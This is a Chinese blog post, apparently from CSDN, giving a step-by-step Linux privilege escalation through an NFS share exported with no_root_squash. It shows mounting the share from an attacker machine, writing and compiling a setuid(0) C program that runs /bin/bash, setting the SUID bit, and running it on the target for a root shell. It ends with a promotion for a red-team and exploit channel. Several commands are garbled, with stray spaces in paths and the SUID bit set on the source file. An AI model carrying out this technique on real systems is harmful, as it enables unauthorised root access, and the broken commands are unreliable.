linux7.7 离线安装nfs客户端_Linux提权姿势二:利用NFS提权

最新推荐文章于 2024-05-27 11:45:39 发布
最新推荐文章于 2024-05-27 11:45:39 发布
阅读量355 收藏
点赞数
文章标签: linux7.7 离线安装nfs客户端 nfs客户端 nfs服务器

如果在服务器上具有低特权shell,并且发现服务器中具有NFS共享,则可以使用它来升级特权。但是成功取决于它的配置方式。

目录

1.什么是NFS?2.什么是root_sqaush和no_root_sqaush?3.所需的工具和程序文件。4.利用NFS弱权限。

什么是NFS?

网络文件系统(NFS)是一个客户端/服务器应用程序,它使计算机用户可以查看和选择存储和更新远程计算机上的文件,就像它们位于用户自己的计算机上一样。在  NFS  协议是几个分布式文件系统标准,网络附加存储(NAS)之一。

NFS是基于UDP/IP协议的应用,其实现主要是采用远程过程调用RPC机制,RPC提供了一组与机器、操作系统以及低层传送协议无关的存取远程文件的操作。RPC采用了XDR的支持。XDR是一种与机器无关的数据描述编码的协议,他以独立与任意机器体系结构的格式对网上传送的数据进行编码和解码,支持在异构系统之间数据的传送。

什么是root_sqaush和no_root_sqaush?

Root Squashing(root_sqaush)参数阻止对连接到NFS卷的远程root用户具有root访问权限。远程根用户在连接时会分配一个用户“ nfsnobody ”,它具有最少的本地特权。如果 no_root_squash 选项开启的话”,并为远程用户授予root用户对所连接系统的访问权限。在配置NFS驱动器时,系统管理员应始终使用“ root_squash ”参数。

注意:要利用此,no_root_squash 选项得开启。

利用NFS并获取Root Shell

现在,我们拿到了一个低权限的shell,我们查看“ / etc / exports ”文件。

/ etc / exports 文件包含将哪些文件夹/文件系统导出到远程用户的配置和权限。

这个文件的内容非常简单,每一行由抛出路径,客户名列表以及每个客户名后紧跟的访问选项构成:

[共享的目录] [主机名或IP(参数,参数)]

其中参数是可选的,当不指定参数时,nfs将使用默认选项。默认的共享选项是 sync,ro,root_squash,no_delay。当主机名或IP地址为空时,则代表共享给任意客户机提供服务。当将同一目录共享给多个客户机,但对每个客户机提供的权限不同时,可以这样:[共享的目录] [主机名1或IP1(参数1,参数2)] [主机名2或IP2(参数3,参数4)]

4853734c9f51a91cc363c848a9fba8d9.png

我们可以看到/ tmp 文件夹是可共享的,远程用户可以挂载它。

还有不安全的参数“ rw ”(读,写),“ sync ”和“ no_root_squash ”

同样我们也可以使用 showmount命令来查看。

showmount命令用于查询NFS服务器的相关信息# showmount --help Usage: showmount [-adehv]        [--all] [--directories] [--exports]        [--no-headers] [--help] [--version] [host]-a或--all    以 host:dir 这样的格式来显示客户主机名和挂载点目录。 -d或--directories    仅显示被客户挂载的目录名。 -e或--exports    显示NFS服务器的输出清单。 -h或--help    显示帮助信息。 -v或--version    显示版本信。 --no-headers    禁止输出描述头部信息。显示NFS客户端信息 # showmount显示指定NFS服务器连接NFS客户端的信息 # showmount 192.168.1.1  #此ip为nfs服务器的显示输出目录列表 # showmount -e显示指定NFS服务器输出目录列表(也称为共享目录列表) # showmount -e 192.168.1.1显示被挂载的共享目录 # showmount -d显示客户端信息和共享目录 # showmount -a显示指定NFS服务器的客户端信息和共享目录# showmount -a 192.168.1.1

这里不多说了

我们接下来在我们的攻击机上安装客户端工具

需要执行以下命令,安装nfs-common软件包。apt会自动安装nfs-common、rpcbind等12个软件包

sudo apt install nfs-commonapt-get install cifs-utils

然后输入命令

showmount -e [IP地址]

9bb7bf40c4d1d48463e3ab3e326b6c82.png

创建目录以挂载远程系统。

mkdir / tmp / test

在/tmp/test上装载Remote/tmp文件夹:

mount -o rw,vers = 2 [IP地址]:/ tmp / tmp / test

7557db13be2ba552c472b37aa1d427a7.png

然后在/tmp/test/中。新建一个c文件。

#include #include #include #include int main() { setuid(0); system("/bin/bash"); return 0; }

也可以

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/test/suid-shell.c

编译:

gcc /tmp/test/suid-shell.c -o / tmp / 1 / suid-shel

赋权:

chmod + s /tmp/test/suid-shell.c

5d15f75a0a0ee9bc71360866935f52df.png

好的,我们回到要提权的服务器上

cd / tmp./suid-shell

c3db61b9934e225b013708743fbb96f4.png

可以看到是ROOT权限了

系列

Linux提权姿势一:滥用SUDO提权

渗透测试 红队攻防 免杀 权限维持 等等技术 

及时分享最新漏洞复现以及EXP 国内外最新技术分享!!!

进来一起学习吧

fdd911fe9d877709c7af180dcaca0207.png

weixin_39926311
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux安装配置nfs
minmax329的博客
02-23 1169
192.168.0.101(rw,no_root_squash,no_all_squash,sync) 为客户的地址及限,地址可以是一个网段(如:192.168.0.0/24),一个IP地址或者是一个域名,域名支持通配符,如:*.root_squash:NFS客户连接服务时如果使用的是root的话,那么对服务分享的目录来说,拥有匿名用户限,通常他将使用nobody或nfsnobody身份;显然开启这项是不安全的。/usr/local/test/ 为共享的目录,使用绝对路径。
linux centos7 离线安装telnet_b13001216978的博客-CSDN博客_linux线安装telnet1
08-04
Linux CentOS 7环境下,离线安装telnet是一项常见的任务,尤其在无法访问公网的服务器上。本教程将详细介绍如何通过RPM包进行离线安装。以下是一个详细步骤的指导: 1. **检查已安装软件包**: 使用`rpm`命令来...
NFS服务线安装
09-03
Ubuntu18.04服务器环境下亲测有效。 资源包含NFS服务的离线安装包,以及安装步骤的描述。
Linux安装系列:NFS文件服务
CancerKing的博客
08-09 547
Linux安装系列:NFS文件服务
最详细Linux总结(建议收藏)
最新发布
HUANGXIN9898的博客
05-27 824
1.只有可以执行的二进制程序文件才能设定SUID限,非二进制文件设置SUID限没任何意义.2.命令执行者要对该程序文件拥有执行(x)限.3.命令执行者在执行该程序时获得该程序文件属主的身份.4.SUID限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效。
linux线安装nfs服务
LIZhonYi的博客
11-29 1885
NFS 是 Network FileSystem 的缩写,顾名思义就是网络文件存储系统,它最早是由 Sun 公司发展出来的,也是 FreeBSD 支持的文件系统中的一个,它允许网络中的计算机之间通过 TCP/IP 网络共享资源。通过 NFS,我们本地 NFS客户应用可以透明地读写位于服务 NFS 服务器上的文件,就像访问本地文件一样方便。简单的理解,NFS 就是可以透过网络,让不同的主机、不同的操作系统可以共享存储的服务。
Linux线安装NFS共享文件
小菜鸟的博客
11-29 1169
链接:https://pan.baidu.com/s/168E2xPHQuKfx9Rq1ezERBw。在客户执行命令:showmount -e 172.17.40.223 会显示服务器共享的文件。程序默认使用2049口,如果被占用需要修改口。然后编辑: vi /etc/exports 文件。清空/exports文件,并添加一下两行代码。在服务创建需要共享的目录 /data。在客户新建/data文件夹。访问以上连接下载离线安装包。
Linux安装mongodb客户
01-20
文中的系统版本: centos7.7 参阅官网 link 1.创建源 sudo vim /etc/yum.repos.d/mongodb-org-4.2.repo 写入: [mongodb-org-4.2] name=MongoDB Repository baseurl=https://repo.mongodb.org/yum/redhat/$releasever/...
NFSClient_1_7.7z
03-20
谷歌代码库中的nfs客户, 代码库链接:https://code.google.com/archive/p/nekodrive/downloads 用以解决部分windows不支持nfs的问题 教程链接:https://blog.csdn.net/qq_43017750/article/details/104984962
centos 7.7 telnet安装
08-04
在本文中,我们将深入探讨如何在CentOS 7.7系统上安装和配置Telnet服务,包括客户和服务,以及依赖的xinetd(Extended Internet Services Daemon)。 首先,让我们了解为什么在CentOS 7.7中安装Telnet是必要的...
centos下离线安装nvidia-docker所需离线
08-06
测试版本为centos 7.7
NFS服务器离线安装
12-01
Ubuntu默认不开启NFS服务,需要手动配置。网上很容易查到方法,即使用apt在线更新方式,调用 sudo apt-get install nfs-kernel-server 即可。然而当开发机器不能联网时,就需要使用离线安装包的方式,这是所需的全部6个安装包。 解压后依次调用 sudo dpkg -i xxx.deb 根据示修改安装次序。
nfs线安装包(含所有依赖-已亲测)
04-25
1、内容概要: NFS:即网络文件系统(Network File System)分布式文件系统协议。 大致逻辑是这样:将A机器的目录/data/nfs设置为共享目录,机器B通过mount的方式和A机器的共享文件夹进行连接。 2、适用人群: Linux上需要安装nfs实现文件文件共享访问的用户 3、使用场景及目标: 工作中遇到了一种情况,原有服务器的存储空间不足,无法满足现有系统的运行,因为一些原因,系统迁移和扩展内存方案不能实行,经排查现在占用内存较大的是系统中的文件存储功能,经调研,可以采用挂载远程共享目录的方式,将文件存储挂载到远程机器的目录,从而扩展了现有存储。Linux现有比较成熟的解决方案有两种,一种是NFS远程挂载,另一种是Samba共享目录。 4、其他说明: 目录的挂载于共享是基于RPC协议进行的,所以B服务器作为挂载方,也应同时具备RPC的应用功能,所以也应同时安装对应的 rpcbind 服务插件(包内都有供) 5、供rpm包安装命令 单个安装:rpm -ivh xxx.rpm 一键安装:rpm -Uvh *.rpm --nodeps --force
LINUX线安装NFS
07-22
Centos6.2离线安装NFS Ubuntu14.04离线安装NFS
cifs-utils-6.2-10.el7.x86_64.rpm
11-30
线安装包,亲测可用
cifs-utils-devel-6.2-10.el7.i686 (1).rpm
12-03
线安装包,测试可用
NFS线安装和离线安装方式
杯酒游四海,仗剑走天涯
05-28 7295
NFS线安装和离线安装方式: 1. 在线安装: 第一步:在文件主服务器上安装 nfs-kernel-server # 1. 安装 rpcbind, nfs 依赖 rpc 进行相互通信 apt-get install -y rpcbind # 2. 安装 nfs-kernel-server sudo apt-get install -y nfs-kernel-server # 3. 新建共享文件主目录 sudo mkdir /home/nfs # 4. 对此文件夹进行授 sudo chmod 777 -
ubuntn离线安装nfs
qq_37698777的博客
08-24 1402
部署服务为了稳定性,需要应用多活,但是有几个业务需要将文件保存到本地目录,但是保存本地目录后,多台虚机无法实现共享,所以需要使用nfs创建共享文件,以达到多个服务都能访问资源文件的目的。/home/stb/ ip地址(async,insecure,no_root_squash,no_subtree_check,rw)链接:https://pan.baidu.com/s/1_QOjeysxB0jJgVpKvS_QCg。由于是在内网部署应用,而且没有镜像资源,需要手动下载安装安装nfs
Linux线/离线安装 NFS 服务及使用
phubing
10-20 3761
NFS工作步骤 1、服务器启动RPC服务,并开启111口 2、服务器启动NFS服务,并向RPC注册口信息 3、客户启动RPC(portmap服务),向服务的RPC(portmap)服务请求服务NFS口 4、服务的RPC(portmap)服务反馈NFS口信息给客户。 5、客户通过获取的NFS口来建立和服务NFS连接并进行数据的传输。 NFS简要操作步骤 1.环境准备 服务器1: 充当文件服务器 (192.168.10.90) 服务器2: 充当客户(1..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值